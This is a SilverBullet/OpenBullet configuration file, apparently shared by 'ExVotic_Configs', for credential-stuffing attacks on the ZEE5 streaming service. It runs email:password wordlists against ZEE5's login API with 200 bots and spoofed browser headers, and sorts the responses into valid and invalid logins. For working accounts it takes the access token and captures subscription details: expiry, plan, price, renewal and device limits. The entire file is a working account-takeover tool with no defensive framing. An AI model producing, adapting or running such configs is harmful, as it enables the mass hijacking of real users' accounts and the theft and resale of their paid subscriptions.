[SETTINGS]
{
  "Name": "ZEE5 CONFIG",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2022-08-01T20:42:22.0708089+05:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "ExVotic_Configs",
  "Version": "1.1.1 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "ZEE5 CONFIG",
  "IconPath": "Icon\\svbfile.ico",
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://whapi.zee5.com/v1/user/loginemail_v2.php" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"aid\":\"91955485578\",\"lotame_cookie_id\":\"\",\"guest_token\":\"465d4352dcb3f3c3c6e3f13e34483b73\",\"platform\":\"web\",\"version\":\"2.51.82\"}" 
  CONTENTTYPE "application/json" 
  HEADER "origin: https://www.zee5.com" 
  HEADER "referer: https://www.zee5.com/" 
  HEADER "sec-ch-ua: \".Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"103\", \"Chromium\";v=\"103\"" 
  HEADER "sec-ch-ua-mobile: ?1" 
  HEADER "sec-ch-ua-platform: \"Android\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "401" 
    KEY "The email address and password combination was wrong during login." 
    KEY "\"code\":2120" 
  KEYCHAIN Success OR 
    KEY "{\"access_token\":\"" 
    KEY "<RESPONSECODE>" Contains "200" 

PARSE "<SOURCE>" JSON "access_token" -> VAR "tk" 

REQUEST GET "https://subscriptionapi.zee5.com/v1/subscription?translation=en&country=IN&include_all=true" 
  
  HEADER "authorization: bearer <tk>" 
  HEADER "origin: https://www.zee5.com" 
  HEADER "referer: https://www.zee5.com/" 
  HEADER "sec-ch-ua: \".Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"103\", \"Chromium\";v=\"103\"" 
  HEADER "sec-ch-ua-mobile: ?1" 
  HEADER "sec-ch-ua-platform: \"Android\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36" 

#EXPIRY PARSE "<SOURCE>" LR ",\"subscription_end\":\"" "T" CreateEmpty=FALSE -> CAP "Expiry" 

#REMAINING_DAYS FUNCTION GetRemainingDay "<Expiry>" -> CAP "REMAINING DAYS" 

#PLAN PARSE "<SOURCE>" JSON "original_title" CreateEmpty=FALSE -> CAP "PLAN" 

#PRICE PARSE "<SOURCE>" JSON "price" CreateEmpty=FALSE -> CAP "PRICE" 

#RENEWAL PARSE "<SOURCE>" JSON "recurring_enabled" CreateEmpty=FALSE -> CAP "RENEWAL" 

#ALLOWED_DEVICES PARSE "<SOURCE>" JSON "number_of_supported_devices" CreateEmpty=FALSE -> CAP "ALLOWED DEVICES" 

KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<REMAINING DAYS>" LessThanOrEqual "0" 
  KEYCHAIN Success OR 
    KEY "<REMAINING DAYS>" GreaterThan "0" 

FUNCTION Constant "@ExVotic_Configs" -> CAP "CONFIG BY" 

